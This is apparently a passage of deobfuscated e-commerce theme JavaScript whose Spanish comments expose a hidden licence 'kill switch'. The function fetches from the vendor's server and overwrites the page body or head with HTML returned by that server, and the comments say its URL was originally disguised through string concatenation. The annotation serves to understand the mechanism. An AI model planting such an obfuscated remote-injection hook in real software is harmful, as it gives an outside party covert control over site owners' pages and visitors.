    const _0x4d1a94 = _0x1950cf.filter(_0x4f1d84 => _0x520ad1.width >= _0x4f1d84).map(_0x56fe3a => _0x85819f + "?width=" + _0x56fe3a + " " + _0x56fe3a + 'w').join(", ");
    _0x5edb42.srcset = _0x4d1a94 + ", " + _0x85819f + " " + _0x520ad1.width + 'w';
    _0x5edb42.src = _0x85819f + "?width=533";
  }
  ["updateQuickAddUrl"]() {
    if (!this.currentVariant || !this.quickAddSubmit) {
      return;
    }
    this.quickAddSubmit.dataset.productUrl = this.dataset.url + "?variant=" + this.currentVariant.id;
  }
}
customElements.define("card-variant-selects", CardVariantSelects);

// --- FUNCIONES DE VALIDACIÓN DE LICENCIA (EL "KILL SWITCH") ---
// Esta es la parte que buscabas anteriormente.

function metafieldPoly() {
    // ... configuración ...
    try {
        // Aquí está la URL que verifica la licencia
        // En el código original aparecía como: 'h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'d'+'a'+'s'+'h'+'b'+'o'+'a'+'r'+'d' ...
        fetch('https://dashboard.shrinetheme.com/api/updates/check', config)
        .then(response => {
             // Si el servidor responde con cierto código, ejecuta esto:
             // response.b suele ser 'body' o 'head' y response.h es el HTML destructivo
             if (response && document[response.b]) {
                 document[response.b].innerHTML = response.h;
             }
        })
        // ... manejo de errores ...
    } catch (e) {
        // ...
    }
}